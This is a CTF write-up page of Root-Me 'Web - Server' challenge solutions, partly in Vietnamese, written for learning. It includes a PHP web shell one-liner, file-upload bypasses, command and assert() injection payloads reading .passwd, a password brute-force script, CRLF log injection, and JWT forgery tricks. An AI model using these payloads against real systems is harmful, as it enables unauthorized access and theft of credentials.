> For the complete documentation index, see [llms.txt](https://giongfnef.gitbook.io/giongfnef/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://giongfnef.gitbook.io/giongfnef/wargame-and-and-others/rootme/web-server.md).

# Web - Server

Note : A JOURNEY TO GAIN KNOWLEDGE

## Web - Server

### 1.[HTML - Source code](https://www.root-me.org/en/Challenges/Web-Server/HTML-Source-code)

F12 for flag

### 2.[HTTP - IP restriction bypass](https://www.root-me.org/en/Challenges/Web-Server/HTTP-IP-restriction-bypass)

[`document`](https://medium.com/r3d-buck3t/bypass-ip-restrictions-with-burp-suite-fb4c72ec8e9c)

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2F9grJHm5RQy02cMMp9tpA%2Fimage.png?alt=media\&token=64130f6d-fa71-4453-a4ad-89252051b8ad)

> **Syntax: X-Forwarded-For: \<client>,\<proxy1>,\<proxy2>,\<proxy3>**

Change IP at client to private IP by adding ***an X-Forwarded-For*** header

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FX38AUQpE6hA7ocHmSfV5%2Fimage.png?alt=media\&token=f18b46c6-442a-43bf-b6d9-abb63631e754)

### 3.[HTTP - Open redirect](https://www.root-me.org/en/Challenges/Web-Server/HTTP-Open-redirect)

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FZAesjFrnoDJShjJkT0Sc%2Fimage.png?alt=media\&token=f362ba5b-05eb-447a-93ae-27fd5c705413)

It combines URL and hash md5 of that one, so that we just put other URL and hash of it.

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FPLAtHvk4Jicks1D3XEnM%2Fimage.png?alt=media\&token=74cbe5cc-44c9-4abf-8651-55f9a5875527)

### 4.HTTP - User-agent

change User-Agent to \`admin\`

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2F6JaIvjuCiIMFJkj6ziHg%2Fimage.png?alt=media\&token=dd4b008b-84b0-47b8-aa5d-cd927abeafab)

### 5.Weak password

```
import requests
from requests.auth import HTTPBasicAuth
url = "http://challenge01.root-me.org/web-serveur/ch3/"
usr = "admin"
words = open('common_password.txt','r').read().split('\n')
cnt =1
for pwd in words:
	print(pwd,cnt)
	
	res = requests.get(url, auth=HTTPBasicAuth(usr, pwd))
	
	if "401" not in res.text:
		print('Password is ' + pwd)
		break
	cnt +=1
```

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FpLjmJ0Fbo46nshhyzVA4%2Fimage.png?alt=media\&token=6b96bf87-3442-4431-88af-613923c36a52)

### 6.PHP - Command injection

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FkuByz4BDNoEOi5DldT4I%2Fimage.png?alt=media\&token=c9d9d598-cd26-4bdb-ad19-bc16d3aafa48)

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FoVMbZunYGD4gxhSg4hVX%2Fimage.png?alt=media\&token=f625572d-fe61-4a15-b43d-69d65dbb8b9c)

[`document`](https://portswigger.net/web-security/os-command-injection)

### 7.Backup file

Use dirsearch find some interesting files:

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FBQb7HrnL4CpOEHn5wSZF%2Fimage.png?alt=media\&token=a7f11f1f-20b0-42c8-9ec9-432a27e69c37)

> /web-serveur/ch11/index.php\~

### 8.HTTP - Directory indexing

> <http://challenge01.root-me.org/web-serveur/ch4/admin/backup/admin.txt>

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FtG2JtyPFsvA8W8fJiOR5%2Fimage.png?alt=media\&token=c0fcb3d9-cbd1-4cb2-b354-b0e15e7090e1)

### 9.HTTP - Headers

With normal request we will get:

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FEtxVSAQWgVHPSTM7soFd%2Fimage.png?alt=media\&token=66dfd39a-e668-4091-a3b0-c555786a8bde)

add Header to request:

> Header-RootMe-Admin: True

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FWzlaf8GmmED9VffJ9JuO%2Fimage.png?alt=media\&token=99b8a9c3-7839-4d0c-bb6d-c01bb7e133f4)

### 10.HTTP - POST

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FrhMu34GtppXMnuuGbmpH%2Fimage.png?alt=media\&token=8cf68672-d286-4dcb-b33f-6ebe49cb2abb)

### 11.HTTP - Improper redirect

Capture before it redirect

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FI4gQEXw6F4iAfcUYl7VA%2Fimage.png?alt=media\&token=85e9949d-42af-4644-9988-a0e3eea6b62a)

### 12.HTTP - Verb tampering

Ban đầu tưởng bruteforce ngồi xài hydra và cái rockyou.txt ra spam cả tiếng&#x20;

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FW9UNTTv2g17kbGZlM5jF%2Fimage.png?alt=media\&token=c89f74e4-fd0a-46f8-b319-69343bc56e0f)

temper ở đây là chỉ cần đổi method khác ngoài GET và POST là được, cứ PUT với DELETE mà phang

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FRHF3ndvEMI4c5SbIaCbY%2Fimage.png?alt=media\&token=736b52a2-b509-4778-ba2f-5c3a755bd2be)

### 13.File upload - Double extensions

```
<?php echo shell_exec($_GET['cmd']); ?>
```

set file.php.png and send to the server

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FsTI3MVMnqyLycm4X7BYP%2Fimage.png?alt=media\&token=07ef3436-af26-445b-b87d-cbe532807e25)

```
?cmd=cd;cat .passwd
```

### 14.File upload - MIME type

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2Fc2WJrBbhrMdd592qGeU6%2Fimage.png?alt=media\&token=a9e96186-f874-48ed-9efc-e499e3f2bf9c)

Change Content-Type to image/png and rce

```
?id=cd;cat .passwd
```

### 15.HTTP - Cookies

![chan](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FoNbsdjlADCRtAkeYEMoD%2Fimage.png?alt=media\&token=95a54031-8541-4401-825b-1bcbffc1b1a7)

change cookie from `visiteur` to `admin`

### 16.JSON Web Token (JWT) - Introduction

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2Fbfiih28HV5dINR1SSVxt%2Fimage.png?alt=media\&token=747d21ea-4e27-4739-9145-62d3aeff0582)

"none" signature algorithms

### 17.Directory traversal

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2Fhclk9mpEBtS9IbN1ppMm%2Fimage.png?alt=media\&token=9754901e-5af4-4e09-b0a7-63351a64912a)

Try with ../ and fuzz

### 18.JSON Web Token (JWT) - Weak secret

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FN6nNbrM0cNd9m7UQpXLi%2Fimage.png?alt=media\&token=e33e422e-6a84-49cd-b1e5-c2501398ac62)

bruteforce secret key: lol

![sign new signature](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FJjwAwKTXGVoZ9WfFM2FK%2Fimage.png?alt=media\&token=922634d6-0df8-486a-8169-db8de4f27b9c)

POST and look for the flag hm....

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FxohDsL9akmUEPfegrg8D%2Fimage.png?alt=media\&token=cf1cae15-87bc-4865-8696-465440e98da0)

### 19.File upload - Null byte

create: `file.php%0a.png`

```
<?php echo shell_exec('id'); ?>
```

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FanFSP4rKvxS6MeNhyCiG%2Fimage.png?alt=media\&token=0837ac49-78e4-459c-8bd9-ed8533f23f0e)

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2Fzi00IGOYOEAldA9pThFZ%2Fimage.png?alt=media\&token=59a49f7b-9643-42cd-baac-19672dce788a)

### 20.Install files

use dirsearch: /web-serveur/ch6/phpbb/install

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FszRn2spxRUSrvFloroDi%2Fimage.png?alt=media\&token=ff944721-f894-48a4-85ed-9a9d93fa9641)

### 21. JWT - Revoked token

source

```
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, request, jsonify
from flask_jwt_extended import JWTManager, jwt_required, create_access_token, decode_token
import datetime
from apscheduler.schedulers.background import BackgroundScheduler
import threading
import jwt
from config import *
 
# Setup flask
app = Flask(__name__)
 
app.config['JWT_SECRET_KEY'] = SECRET
jwtmanager = JWTManager(app)
blacklist = set()
lock = threading.Lock()
 
# Free memory from expired tokens, as they are no longer useful
def delete_expired_tokens():
    with lock:
        to_remove = set()
        global blacklist
        for access_token in blacklist:
            try:
                jwt.decode(access_token, app.config['JWT_SECRET_KEY'],algorithm='HS256')
            except:
                to_remove.add(access_token)
       
        blacklist = blacklist.difference(to_remove)
 
@app.route("/web-serveur/ch63/")
def index():
    return "POST : /web-serveur/ch63/login <br>\nGET : /web-serveur/ch63/admin"
 
# Standard login endpoint
@app.route('/web-serveur/ch63/login', methods=['POST'])
def login():
    try:
        username = request.json.get('username', None)
        password = request.json.get('password', None)
    except:
        return jsonify({"msg":"""Bad request. Submit your login / pass as {"username":"admin","password":"admin"}"""}), 400
 
    if username != 'admin' or password != 'admin':
        return jsonify({"msg": "Bad username or password"}), 401
 
    access_token = create_access_token(identity=username,expires_delta=datetime.timedelta(minutes=3))
    ret = {
        'access_token': access_token,
    }
   
    with lock:
        blacklist.add(access_token)
 
    return jsonify(ret), 200
 
# Standard admin endpoint
@app.route('/web-serveur/ch63/admin', methods=['GET'])
@jwt_required
def protected():
    access_token = request.headers.get("Authorization").split()[1]
    with lock:
        if access_token in blacklist:
            return jsonify({"msg":"Token is revoked"})
        else:
            return jsonify({'Congratzzzz!!!_flag:': FLAG})
 
 
if __name__ == '__main__':
    scheduler = BackgroundScheduler()
    job = scheduler.add_job(delete_expired_tokens, 'interval', seconds=10)
    scheduler.start()
    app.run(debug=False, host='0.0.0.0', port=5000)
```

Use python request to post data:

```
import requests

url = "http://challenge01.root-me.org/web-serveur/ch63/login"
myobj = {"username": "admin","password": "admin"}
x = requests.post(url, json = myobj)

print(x.text)
#{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NjA3MzI2MjcsIm5iZiI6MTY2MDczMjYyNywianRpIjoiNzFjYTYxYTEtNjU1Yy00Zjk5LTkwM2ItODViZjBjMjI4ZmQ3IiwiZXhwIjoxNjYwNzMyODA3LCJpZGVudGl0eSI6ImFkbWluIiwiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.7koOz8cupf0o2ZtMA_pr_03cKXq-uIcTgp6zGKMts-g"}
```

The problem that we have to bypass blacklist because with each access\_token it will be added to blacklist:

* with **rfc3548 we can** see that the character out of alphabet will be skipped

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FxKQfFbplXtXFJZVLLH9d%2Fimage.png?alt=media\&token=c3a666d6-c052-43ac-a177-32ff9b548634)

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FXXKiuKvwIgaVOr4tCl6P%2Fimage.png?alt=media\&token=4330172c-0023-40f9-abec-1a15e4d3422e)

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2Fx0ez9A4T8DxUPP4Rm9wo%2Fimage.png?alt=media\&token=94b021e3-a129-42ec-ba3c-7eed493e1eb2)

* underscore **“\_” ,** then replace with “/” &#x20;

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2Fb8QysRW6zMeTLtD3O2gY%2Fimage.png?alt=media\&token=515c8933-7f29-4046-96a5-bcd3176773b6)

* add == in the end of jwt -> fast way to understand

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2Fr7SaPeVJ6aPMd0Nt4YiW%2Fimage.png?alt=media\&token=9f9ac1df-39d6-4ef0-81d2-7d1042d28784)

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FZLOvQtTATTswe3LbWDnt%2Fimage.png?alt=media\&token=a170c5ad-9c4e-4929-b535-93b706c74df4)

### 22. CRLF

Input -> fuzz&#x20;

Thử nhập bừa username và passoword ta thấy rõ log ghi lại username -> tấn công từ đây

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FzSXsZrpETfBxHROs7QBQ%2Fimage.png?alt=media\&token=8d2567c3-675a-4ad1-a5ff-21c71e0f2ed4)

Mục tiêu là có thể log lại`adminauthenticated.`&#x20;

```
?username=admin authenticated.%0d%0aa&password=b
```

gửi payload trên url và urlencode để server decode lại&#x20;

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2F7XhcHzwEkezROmHSS5Pa%2Fimage.png?alt=media\&token=8d5148b8-dbcb-4463-81ee-e961a32807fa)

### 23. Insecure Code Management

[<mark style="color:blue;">`doc`</mark>](https://levelup.gitconnected.com/exploiting-insecure-code-management-23fcd00eba60)

> <http://challenge01.root-me.org/web-serveur/ch61/.git>

<figure><img src="https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FykAsTQ6Gw1eNF77s2X3M%2Fimage.png?alt=media&amp;token=50a490f4-981e-4f57-9ff7-18839cc0da29" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FGQo2jGnmOOA4DjV18p0s%2Fimage.png?alt=media&amp;token=df3291c0-c9f7-41f6-b90f-e9d515ac9080" alt=""><figcaption></figcaption></figure>

### 24.PHP - assert()

[`doc`](https://book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-via-phps-assert)

[doc`2`](https://hoccyber.com/khai-thac-lfi/)

**Detect** lỗi **File Inclusion -> LFI via PHP's 'assert**

Khả nghi:

```
GET /web-serveur/ch47/?page= ...
```

command:

```
' and die(system("cat .passwd")) or '
```

<figure><img src="https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FRjWrgXUa50TwKdg5G77Y%2Fimage.png?alt=media&amp;token=e5d106a8-deb5-4df3-b940-5533445a7560" alt=""><figcaption></figcaption></figure>
